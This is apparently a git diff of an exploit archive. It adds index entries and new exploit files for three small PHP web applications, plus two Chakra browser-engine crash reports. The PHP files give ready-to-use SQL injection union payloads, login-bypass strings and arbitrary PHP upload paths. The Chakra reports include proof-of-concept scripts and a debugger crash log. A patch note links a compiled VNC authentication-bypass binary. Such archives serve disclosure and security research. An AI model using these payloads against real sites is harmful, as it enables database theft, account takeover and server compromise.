 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps,0
@@ -38259,3 +38277,6 @@ id,file,description,date,author,platform,type,port
 42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
 42458,platforms/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps,0
 42457,platforms/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps,0
+42461,platforms/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42462,platforms/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
+42463,platforms/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/multiple/remote/1791.patch b/platforms/multiple/remote/1791.patch
index 4bf8b208f..3121ab6e8 100755
--- a/platforms/multiple/remote/1791.patch
+++ b/platforms/multiple/remote/1791.patch
@@ -15,6 +15,5 @@ xx  vnc-4_1_1-unixsrc.bl4ck/common/rfb/CConnection.cxx
        os->flush();
        vlog.debug("Choosing security type %s(%d)",secTypeName(secType),secType);     }
 
+E-DB Note:
 Compiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar)
-
-
diff --git a/platforms/php/webapps/42461.txt b/platforms/php/webapps/42461.txt
new file mode 100755
index 000000000..87360ec07
--- /dev/null
+++ b/platforms/php/webapps/42461.txt
@@ -0,0 +1,56 @@
+# # # # #
+# Exploit Title: Online Quiz Project 1.0 - Multiple Vulnerabilities
+# Dork: N/A
+# Date: 17.08.2017
+# Vendor Homepage : http://surajkumar.in/
+# Software Link: http://surajkumar.in/product/online-quiz-project-php/
+# Demo: http://surajkumar.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands...
+# The vulnerability allows an attacker to access the user panel...
+# 
+# Vulnerable Source:
+# # # # #
+# <?php
+# ....1
+# if(isset($_POST['_login'])){
+# $data=array();
+# $data['user']=$_POST['_user'];
+# $data['password']=$_POST['_password'];
+# $userLogin=user_login($data);
+# _t($userLogin);
+# if($userLogin['bool']==fa
+# 
+# ....2
+# $questionData='';
+# if(isset($_GET['cat_id'])){
+# $userData=get_result_by_user($_SESSION['user']['user_id'],$_GET['cat_id']);
+# ....
+# }else{
+# $query=mysqli_query($db,"SELECT * FROM user_answered WHERE user_id='$user_id' AND cat_id='$cat_id'");
+# }
+# ....
+# ?>
+# # # # #
+# 	
+# Proof of Concept:
+# 
+# 1:
+# http://localhost/[PATH]/result.php?cat_id=[SQL]
+# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-&docname=0x30783330
+# 
+# 2:
+# http://localhost/[PATH]/login.php
+# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42462.txt b/platforms/php/webapps/42462.txt
new file mode 100755
index 000000000..3d369a973
--- /dev/null
+++ b/platforms/php/webapps/42462.txt
@@ -0,0 +1,78 @@
+# # # # #
+# Exploit Title: Photogallery Project 1.0 - Multiple Vulnerabilities
+# Dork: N/A
+# Date: 17.08.2017
+# Vendor Homepage : http://surajkumar.in/
+# Software Link: http://surajkumar.in/product/photogallery-project-in-php/
+# Demo: http://surajkumar.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands...
+# The vulnerability allows an attacker to access the normal member and administration panel...
+# The vulnerability allows an ordinary member upload arbitrary file...
+# 
+# Vulnerable Source:
+# # # # #
+# <?php
+# ....1
+# $pageContent=get_pages($_GET['page_id']);
+# ..
+# function get_pages($pageid){
+# $res=array();
+# global $connection;
+# if($pageid==0){
+# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE);
+# }else{
+# $fetchPages=mysqli_query($connection,"SELECT * FROM ".PAGE." WHERE id='$pageid'");
+# 
+# ....2
+# $userData=get_user_by_id($_SESSION['userID']);
+# if(isset($_POST['user_image'])){
+# $userImage=$_FILES['userImg']['name'];
+# $userTmpImage=$_FILES['userImg']['tmp_name'];
+# if(!file_exists('profile_pics'.'/'.$userImage)){
+# $img=$userImage;
+# }else{
+# $rand=rand(1,1000);
+# $img=$rand.'_'.$userImage;
+# }
+# if(move_uploaded_file($userTmpImage,'profile_pics'.'/'.$img)){
+# $updateImg=update_profile_img($img,$userData['userData']['id']);
+# if($updateImg['bool']==true){
+# 
+# ....3
+# if(isset($_POST['_login'])){
+# $data=array();
+# $data['email']=$_POST['_email'];
+# $data['password']=$_POST['_pass'];
+# $loginRes=user_login($data);
+# if($loginRes['bool']==true){
+# ....
+# ?>
+# # # # #
+# 	
+# Proof of Concept:
+# 
+# 1:
+# http://localhost/[PATH]/page.php?page_id=[SQL]
+# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/++0x283129,0x283229,0x283329,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283529)+--+-&title=<h1>%49%68%73%61%6e%20%53%65%6e%63%61%6e</h1>
+# 
+# 2:
+# http://localhost/[PATH]/edit_profile_img.php?profile_id=[ID]
+# http://localhost/[PATH]/profile_pics/[FILE].php
+# 
+# 3:
+# http://localhost/[PATH]/login.php
+# http://localhost/[PATH]/admin
+# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/42463.txt b/platforms/php/webapps/42463.txt
new file mode 100755
index 000000000..9122bd602
--- /dev/null
+++ b/platforms/php/webapps/42463.txt
@@ -0,0 +1,71 @@
+# # # # #
+# Exploit Title: Doctor Patient Project 1.0 - Multiple Vulnerabilities
+# Dork: N/A
+# Date: 17.08.2017
+# Vendor Homepage : http://surajkumar.in/
+# Software Link: http://surajkumar.in/product/doctor-patient-project-php/
+# Demo: http://surajkumar.in/
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands...
+# The vulnerability allows an attacker to access the administration panel...
+# The vulnerability allows an paitent and doctors users upload arbitrary file...
+# 
+# Vulnerable Source:
+# # # # #
+# <?php
+# ....1
+# if(isset($_GET['docID']) && isset($_GET['docname'])){
+# $docID=$_GET['docID'];
+# $docname=$_GET['docname'];
+# $docData=docData($docID);
+# ...
+# function docData($docID){
+# $res=array();
+# $query=mysql_query("SELECT * FROM ".USERS.",".DOC." WHERE ".DOC.".doc_id='$docID' AND ".USERS.".id=".DOC.".doc_id");
+# if(mysql_num_rows($query)>0){
+#  	
+# ....2
+# $data['_filename']=$_FILES['_docImage']['name'];
+# $data['_filetmp']=$_FILES['_docImage']['tmp_name'];
+# $data['_folder']='doc_images';
+# 
+# ....3
+# if(isset($_POST['signin'])){
+# $data=array();
+# $data['user']=$_POST['user'];
+# $data['pass']=$_POST['pass'];
+# $res=adminLogin($data);
+# if($res['bool']==true){
+# ....
+# ?>
+# # # # #
+# 	
+# Proof of Concept:
+# 
+# 1:
+# http://localhost/[PATH]/single.php?docID=[SQL]
+# -1'+/*!22222UnIoN*/(/*!22222SeLeCT*/+0x283129,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),/*!11111Concat*/(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529)--+-&docname=0x30783330
+# 
+# 2/1:
+# http://localhost/[PATH]/patient/profile.php
+# http://localhost/[PATH]/patient/pat_images/[FILE].php
+# 
+# 2/2:
+# http://localhost/[PATH]/doctor/profile.php
+# http://localhost/[PATH]/doctor/doc_images/[FILE].php
+# 
+# 3:
+# http://localhost/[PATH]/admin
+# User: 'or 1=1 or ''=' Pass: 'or 1=1 or ''='
+# 
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/dos/42464.html b/platforms/windows/dos/42464.html
new file mode 100755
index 000000000..f8317e88a
--- /dev/null
+++ b/platforms/windows/dos/42464.html
@@ -0,0 +1,76 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1266
+
+function trigger() {
+    try {
+    } catch (x) {
+        var x = 1;
+    }
+
+    print(x);
+}
+
+trigger();
+
+When Chakra executes the above code, it declares two "x"s. One is only for the catch scope, the other is for the whole function scope. The one for the whole function scope is initialized with undefined at the start of the function. If the bytecode generator incorrectly chooses the "x" to initialize, the "x" for the function scope may remain uninitialized. This choice is made in the following code in "ByteCodeGenerator::DefineUserVars".
+
+void ByteCodeGenerator::DefineUserVars(FuncInfo *funcInfo)
+{
+    ...
+    for (pnode = funcInfo->root->sxFnc.pnodeVars; pnode; pnode = pnode->sxVar.pnodeNext)
+    {
+        Symbol* sym = pnode->sxVar.sym;
+
+        if (sym != nullptr && !(pnode->sxVar.isBlockScopeFncDeclVar && sym->GetIsBlockVar()))
+        {
+            if (sym->GetIsCatch() || (pnode->nop == knopVarDecl && sym->GetIsBlockVar()))
+            {
+                ...
+                sym = funcInfo->bodyScope->FindLocalSymbol(sym->GetName()); <<< This returns the symbol for the function scope.
+                ...
+            }
+        }
+
+        // Emit bytecode which initalizes "sym"
+    }
+    ...
+}
+
+
+However, there's a buggy case that "sym->GetIsCatch()" returns false when it must return true.
+
+Here's a snippet of "PreVisitCatch". This function is supposed to call "SetIsCatch" for all the symbols in the exception parameter. But it doesn't call "SetIsCatch" when the condition "pnode->sxCatch.pnodeParam->nop == knopParamPattern" is satisfied. The PoC reproduces that case, the "x" for the function scope will refer to an uninitialized value in the stack.
+
+void PreVisitCatch(ParseNode *pnode, ByteCodeGenerator *byteCodeGenerator)
+{
+    // Push the catch scope and add the catch expression to it.
+    byteCodeGenerator->StartBindCatch(pnode);
+    if (pnode->sxCatch.pnodeParam->nop == knopParamPattern)
+    {
+        Parser::MapBindIdentifier(pnode->sxCatch.pnodeParam->sxParamPattern.pnode1, [&](ParseNodePtr item)
+        {
+            Symbol *sym = item->sxVar.sym;
+        });
+    }
+    else
+    {
+        Symbol *sym = *pnode->sxCatch.pnodeParam->sxPid.symRef;
+        sym->SetIsCatch(true);
+        pnode->sxCatch.pnodeParam->sxPid.sym = sym;
+    }
+    ...
+}
+
+PoC:
+-->
+
+function trigger() {
+    try {
+    } catch ({x}) {
+        var x = 1;
+    }
+
+    print(x);
+}
+
+trigger();
diff --git a/platforms/windows/dos/42465.html b/platforms/windows/dos/42465.html
new file mode 100755
index 000000000..870ce122f
--- /dev/null
+++ b/platforms/windows/dos/42465.html
@@ -0,0 +1,378 @@
+<!--
+Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
+
+There is a classic heap overflow when eval a string which large enough in Chakra!
+This issue can be reproduced steadly in uptodate Edge in Win10 WIP.
+An exception will occur immediatly when opening POC.html in Edge.
+
+
+
+	//ChakraCore-master\lib\Runtime\Library\GlobalObject.cpp
+	
+    ScriptFunction* GlobalObject::DefaultEvalHelper(ScriptContext* scriptContext, const char16 *source, int sourceLength, ModuleID moduleID, uint32 grfscr, LPCOLESTR pszTitle, BOOL registerDocument, BOOL isIndirect, BOOL strictMode)
+    {
+        Assert(sourceLength >= 0);
+        AnalysisAssert(scriptContext);
+        if (scriptContext->GetThreadContext()->EvalDisabled())
+        {
+            throw Js::EvalDisabledException();
+        }
+
+#ifdef PROFILE_EXEC
+        scriptContext->ProfileBegin(Js::EvalCompilePhase);
+#endif
+        void * frameAddr = nullptr;
+        GET_CURRENT_FRAME_ID(frameAddr);
+
+        HRESULT hr = S_OK;
+        HRESULT hrParser = S_OK;
+        HRESULT hrCodeGen = S_OK;
+        CompileScriptException se;
+        Js::ParseableFunctionInfo * funcBody = NULL;
+
+        BEGIN_LEAVE_SCRIPT_INTERNAL(scriptContext);
+        BEGIN_TRANSLATE_EXCEPTION_TO_HRESULT
+        {
+            uint cchSource = sourceLength;
+            size_t cbUtf8Buffer = (cchSource + 1) * 3;		//OVERFLOW when cchSource large enough!!!
+
+            ArenaAllocator tempArena(_u("EvalHelperArena"), scriptContext->GetThreadContext()->GetPageAllocator(), Js::Throw::OutOfMemory);
+            LPUTF8 utf8Source = AnewArray(&tempArena, utf8char_t, cbUtf8Buffer);		//Allocate memory on Arena heap with a incorrect but smaller size
+
+            Assert(cchSource < MAXLONG);
+            size_t cbSource = utf8::EncodeIntoAndNullTerminate(utf8Source, source, static_cast< charcount_t >(cchSource));		//OOB write HERE!!!
+            Assert(cbSource + 1 <= cbUtf8Buffer);
+
+            SRCINFO const * pSrcInfo = scriptContext->GetModuleSrcInfo(moduleID);
+			
+            [...]
+
+            LEAVE_PINNED_SCOPE();
+        }
+        END_TRANSLATE_EXCEPTION_TO_HRESULT(hr);
+        END_LEAVE_SCRIPT_INTERNAL(scriptContext);
+
+
+#ifdef PROFILE_EXEC
+        scriptContext->ProfileEnd(Js::EvalCompilePhase);
+#endif
+        THROW_KNOWN_HRESULT_EXCEPTIONS(hr, scriptContext);
+
+        if (!SUCCEEDED(hrParser))
+        {
+            JavascriptError::ThrowParserError(scriptContext, hrParser, &se);
+        }
+        else if (!SUCCEEDED(hrCodeGen))
+        {
+            [...]
+        }
+        else
+        {
+
+            [...]
+
+            ScriptFunction* pfuncScript = funcBody->IsCoroutine() ?
+                scriptContext->GetLibrary()->CreateGeneratorVirtualScriptFunction(funcBody) :
+                scriptContext->GetLibrary()->CreateScriptFunction(funcBody);
+
+            return pfuncScript;
+        }
+    }
+	
+	
+	//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
+    __range(0, cch * 3)
+    size_t EncodeIntoAndNullTerminate(__out_ecount(cch * 3 + 1) utf8char_t *buffer, __in_ecount(cch) const char16 *source, charcount_t cch)
+    {
+        size_t result = EncodeInto(buffer, source, cch);
+        buffer[result] = 0;
+        return result;
+    }
+	
+	//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
+    __range(0, cch * 3)
+        size_t EncodeInto(__out_ecount(cch * 3) LPUTF8 buffer, __in_ecount(cch) const char16 *source, charcount_t cch)
+    {
+        return EncodeIntoImpl<true>(buffer, source, cch);
+    }
+	
+	//ChakraCore-master\lib\Common\Codex\Utf8Codex.cpp
+	    template <bool cesu8Encoding>
+    __range(0, cchIn * 3)
+    size_t EncodeIntoImpl(__out_ecount(cchIn * 3) LPUTF8 buffer, __in_ecount(cchIn) const char16 *source, charcount_t cchIn)
+    {
+        charcount_t cch = cchIn; // SAL analysis gets confused by EncodeTrueUtf8's dest buffer requirement unless we alias cchIn with a local
+        LPUTF8 dest = buffer;
+
+        if (!ShouldFastPath(dest, source)) goto LSlowPath;
+
+LFastPath:
+        while (cch >= 4)
+        {
+            uint32 first = ((const uint32 *)source)[0];
+            if ( (first & 0xFF80FF80) != 0) goto LSlowPath;
+            uint32 second = ((const uint32 *)source)[1];
+            if ( (second & 0xFF80FF80) != 0) goto LSlowPath;
+            *(uint32 *)dest = (first & 0x0000007F) | ((first & 0x007F0000) >> 8) | ((second & 0x0000007f) << 16) | ((second & 0x007F0000) << 8);		//OOB write HERE finally!!!
+            dest += 4;
+            source += 4;
+            cch -= 4;
+        }
+
+LSlowPath:
+        if (cesu8Encoding)
+        {
+			[...]
+        }
+        else
+        {
+            [...]
+        }
+
+        return dest - buffer;
+    }
+
+Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
+Executable search path is: 
+ModLoad: 00007ff6`26db0000 00007ff6`26dd5000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
+ModLoad: 00007ffc`fc060000 00007ffc`fc23b000   C:\Windows\SYSTEM32\ntdll.dll
+ModLoad: 00007ffc`fb9d0000 00007ffc`fba7e000   C:\Windows\System32\KERNEL32.DLL
+ModLoad: 00007ffc`f90a0000 00007ffc`f92e9000   C:\Windows\System32\KERNELBASE.dll
+ModLoad: 00007ffc`f6b90000 00007ffc`f6c0e000   C:\Windows\SYSTEM32\apphelp.dll
+ModLoad: 00007ffc`fbbb0000 00007ffc`fbea9000   C:\Windows\System32\combase.dll
+ModLoad: 00007ffc`f94c0000 00007ffc`f95b6000   C:\Windows\System32\ucrtbase.dll
+ModLoad: 00007ffc`fba80000 00007ffc`fbba5000   C:\Windows\System32\RPCRT4.dll
+ModLoad: 00007ffc`f8620000 00007ffc`f868a000   C:\Windows\System32\bcryptPrimitives.dll
+ModLoad: 00007ffc`fbfc0000 00007ffc`fc05d000   C:\Windows\System32\msvcrt.dll
+ModLoad: 00007ffc`ebd60000 00007ffc`ebdc0000   C:\Windows\SYSTEM32\wincorlib.DLL
+ModLoad: 00007ffc`fac50000 00007ffc`fad10000   C:\Windows\System32\OLEAUT32.dll
+ModLoad: 00007ffc`f8580000 00007ffc`f861a000   C:\Windows\System32\msvcp_win.dll
+ModLoad: 00007ffc`f8560000 00007ffc`f8571000   C:\Windows\System32\kernel.appcore.dll
+ModLoad: 00007ffc`dae30000 00007ffc`db1f4000   C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
+ModLoad: 00007ffc`f86f0000 00007ffc`f8de2000   C:\Windows\System32\Windows.Storage.dll
+ModLoad: 00007ffc`f95c0000 00007ffc`f9661000   C:\Windows\System32\advapi32.dll
+ModLoad: 00007ffc`faf10000 00007ffc`faf69000   C:\Windows\System32\sechost.dll
+ModLoad: 00007ffc`f97b0000 00007ffc`f9801000   C:\Windows\System32\shlwapi.dll
+ModLoad: 00007ffc`fb9a0000 00007ffc`fb9c7000   C:\Windows\System32\GDI32.dll
+ModLoad: 00007ffc`f8e40000 00007ffc`f8fc8000   C:\Windows\System32\gdi32full.dll
+ModLoad: 00007ffc`fadc0000 00007ffc`faf0a000   C:\Windows\System32\USER32.dll
+ModLoad: 00007ffc`f8fd0000 00007ffc`f8fee000   C:\Windows\System32\win32u.dll
+ModLoad: 00007ffc`fad10000 00007ffc`fadba000   C:\Windows\System32\shcore.dll
+ModLoad: 00007ffc`f84d0000 00007ffc`f851c000   C:\Windows\System32\powrprof.dll
+ModLoad: 00007ffc`f8520000 00007ffc`f8535000   C:\Windows\System32\profapi.dll
+ModLoad: 00007ffc`eff10000 00007ffc`f0196000   C:\Windows\SYSTEM32\iertutil.dll
+ModLoad: 00007ffc`f8400000 00007ffc`f8429000   C:\Windows\SYSTEM32\USERENV.dll
+ModLoad: 00007ffc`f3a60000 00007ffc`f3a86000   C:\Windows\SYSTEM32\clipc.dll
+ModLoad: 00007ffc`f77d0000 00007ffc`f7801000   C:\Windows\SYSTEM32\ntmarta.dll
+ModLoad: 00007ffc`f7f20000 00007ffc`f7f37000   C:\Windows\SYSTEM32\cryptsp.dll
+ModLoad: 00007ffc`f7b60000 00007ffc`f7c04000   C:\Windows\SYSTEM32\DNSAPI.dll
+ModLoad: 00007ffc`faf70000 00007ffc`fafdc000   C:\Windows\System32\WS2_32.dll
+ModLoad: 00007ffc`f9710000 00007ffc`f9718000   C:\Windows\System32\NSI.dll
+ModLoad: 00007ffc`f9780000 00007ffc`f97ad000   C:\Windows\System32\IMM32.DLL
+ModLoad: 00007ffc`f7b20000 00007ffc`f7b57000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
+ModLoad: 00007ffc`f6dc0000 00007ffc`f6f30000   C:\Windows\SYSTEM32\twinapi.appcore.dll
+ModLoad: 00007ffc`f83a0000 00007ffc`f83c5000   C:\Windows\SYSTEM32\bcrypt.dll
+ModLoad: 00007ffc`f7600000 00007ffc`f7621000   C:\Windows\SYSTEM32\profext.dll
+ModLoad: 00007ffc`e85e0000 00007ffc`e8654000   C:\Windows\SYSTEM32\msiso.dll
+ModLoad: 00007ffc`f4060000 00007ffc`f4082000   C:\Windows\SYSTEM32\EShims.dll
+ModLoad: 00007ffc`efdc0000 00007ffc`efddb000   C:\Windows\SYSTEM32\MPR.dll
+ModLoad: 00007ffc`fb410000 00007ffc`fb555000   C:\Windows\System32\ole32.dll
+ModLoad: 00007ffc`f6cf0000 00007ffc`f6d85000   C:\Windows\system32\uxtheme.dll
+ModLoad: 00007ffc`e7140000 00007ffc`e71e1000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
+ModLoad: 00007ffc`dc6c0000 00007ffc`ddd71000   C:\Windows\SYSTEM32\edgehtml.dll
+ModLoad: 00007ffc`f0b20000 00007ffc`f0b5f000   C:\Windows\SYSTEM32\MLANG.dll
+ModLoad: 00007ffc`f5120000 00007ffc`f5259000   C:\Windows\SYSTEM32\wintypes.dll
+ModLoad: 00007ffc`dbb80000 00007ffc`dc36b000   C:\Windows\SYSTEM32\chakra.dll
+ModLoad: 00007ffc`f5640000 00007ffc`f56b6000   C:\Windows\SYSTEM32\policymanager.dll
+ModLoad: 00007ffc`f55a0000 00007ffc`f562f000   C:\Windows\SYSTEM32\msvcp110_win.dll
+ModLoad: 00007ffc`f41e0000 00007ffc`f4376000   C:\Windows\SYSTEM32\PROPSYS.dll
+ModLoad: 00007ffc`e6230000 00007ffc`e62fb000   C:\Windows\System32\ieproxy.dll
+ModLoad: 00007ffc`eb8e0000 00007ffc`eb9e6000   C:\Windows\System32\Windows.UI.dll
+ModLoad: 00007ffc`eb570000 00007ffc`eb5f2000   C:\Windows\SYSTEM32\TextInputFramework.dll
+ModLoad: 00007ffc`f65d0000 00007ffc`f66b3000   C:\Windows\SYSTEM32\CoreMessaging.dll
+ModLoad: 00007ffc`eb600000 00007ffc`eb8d2000   C:\Windows\SYSTEM32\CoreUIComponents.dll
+ModLoad: 00007ffc`f1ec0000 00007ffc`f1ed5000   C:\Windows\SYSTEM32\usermgrcli.dll
+ModLoad: 00007ffc`ee290000 00007ffc`ee7c1000   C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+ModLoad: 00007ffc`f9810000 00007ffc`fac47000   C:\Windows\System32\shell32.dll
+ModLoad: 00007ffc`f8df0000 00007ffc`f8e39000   C:\Windows\System32\cfgmgr32.dll
+ModLoad: 00007ffc`ec070000 00007ffc`ec09a000   C:\Windows\SYSTEM32\dwmapi.dll
+ModLoad: 00007ffc`e8d00000 00007ffc`e902e000   C:\Windows\SYSTEM32\WININET.dll
+ModLoad: 00007ffc`f83d0000 00007ffc`f8400000   C:\Windows\SYSTEM32\SspiCli.dll
+ModLoad: 00007ffc`fb020000 00007ffc`fb186000   C:\Windows\System32\msctf.dll
+ModLoad: 00007ffc`eea60000 00007ffc`eeb62000   C:\Windows\SYSTEM32\mrmcorer.dll
+ModLoad: 00007ffc`e4cf0000 00007ffc`e4d00000   C:\Windows\SYSTEM32\tokenbinding.dll
+ModLoad: 00007ffc`ebcc0000 00007ffc`ebd29000   C:\Windows\SYSTEM32\Bcp47Langs.dll
+ModLoad: 00007ffc`e9920000 00007ffc`e993b000   C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
+ModLoad: 00007ffc`f28b0000 00007ffc`f2987000   C:\Windows\SYSTEM32\winhttp.dll
+ModLoad: 00007ffc`f7d80000 00007ffc`f7ddc000   C:\Windows\system32\mswsock.dll
+ModLoad: 00007ffc`f3c20000 00007ffc`f3c2b000   C:\Windows\SYSTEM32\WINNSI.DLL
+ModLoad: 00007ffc`f01f0000 00007ffc`f03b8000   C:\Windows\SYSTEM32\urlmon.dll
+ModLoad: 00007ffc`f8390000 00007ffc`f839b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
+ModLoad: 00007ffc`e5180000 00007ffc`e519a000   C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
+ModLoad: 00007ffc`e2c80000 00007ffc`e2e0a000   C:\Windows\SYSTEM32\ieapfltr.dll
+ModLoad: 00007ffc`f5820000 00007ffc`f583d000   C:\Windows\System32\rmclient.dll
+ModLoad: 00007ffc`e3e70000 00007ffc`e3e88000   C:\Windows\System32\UiaManager.dll
+ModLoad: 00007ffc`e24c0000 00007ffc`e2507000   C:\Windows\system32\dataexchange.dll
+ModLoad: 00007ffc`f5cf0000 00007ffc`f5fcf000   C:\Windows\SYSTEM32\d3d11.dll
+ModLoad: 00007ffc`f66c0000 00007ffc`f67e2000   C:\Windows\SYSTEM32\dcomp.dll
+ModLoad: 00007ffc`f7340000 00007ffc`f73e4000   C:\Windows\SYSTEM32\dxgi.dll
+ModLoad: 00007ffc`ed850000 00007ffc`ed8d2000   C:\Windows\system32\twinapi.dll
+ModLoad: 00007ffc`df920000 00007ffc`df99a000   C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
+ModLoad: 00007ffc`dc620000 00007ffc`dc648000   C:\Windows\SYSTEM32\srpapi.dll
+ModLoad: 00007ffc`f92f0000 00007ffc`f94b9000   C:\Windows\System32\CRYPT32.dll
+ModLoad: 00007ffc`f8540000 00007ffc`f8551000   C:\Windows\System32\MSASN1.dll
+ModLoad: 00007ffc`deaf0000 00007ffc`deb4a000   C:\Windows\System32\Windows.Graphics.dll
+ModLoad: 00007ffc`f3ba0000 00007ffc`f3bfd000   C:\Windows\SYSTEM32\ninput.dll
+ModLoad: 00007ffc`f6020000 00007ffc`f65c4000   C:\Windows\SYSTEM32\d2d1.dll
+ModLoad: 00007ffc`e9a00000 00007ffc`e9cbf000   C:\Windows\SYSTEM32\DWrite.dll
+ModLoad: 00007ffc`dc5e0000 00007ffc`dc5ef000   C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
+ModLoad: 00007ffc`eb400000 00007ffc`eb442000   C:\Windows\SYSTEM32\vm3dum64.dll
+ModLoad: 00007ffc`eb390000 00007ffc`eb3f7000   C:\Windows\SYSTEM32\D3D10Level9.dll
+ModLoad: 00007ffc`f3150000 00007ffc`f31bb000   C:\Windows\System32\oleacc.dll
+ModLoad: 00007ffc`dc5d0000 00007ffc`dc5e0000   C:\Windows\system32\msimtf.dll
+ModLoad: 00007ffc`e9970000 00007ffc`e99f8000   C:\Windows\system32\directmanipulation.dll
+ModLoad: 00007ffc`db710000 00007ffc`db724000   C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
+ModLoad: 00007ffc`dc590000 00007ffc`dc5c8000   C:\Windows\System32\smartscreenps.dll
+ModLoad: 00007ffc`e9780000 00007ffc`e9908000   C:\Windows\SYSTEM32\windows.globalization.dll
+(2004.11d0): Access violation - code c0000005 (!!! second chance !!!)
+chakra!utf8::EncodeIntoImpl<1>+0xb5:
+00007ffc`dbdb69e5 418910          mov     dword ptr [r8],edx ds:0000023d`22d81000=????????
+0:016> r
+rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100
+rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000
+rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60
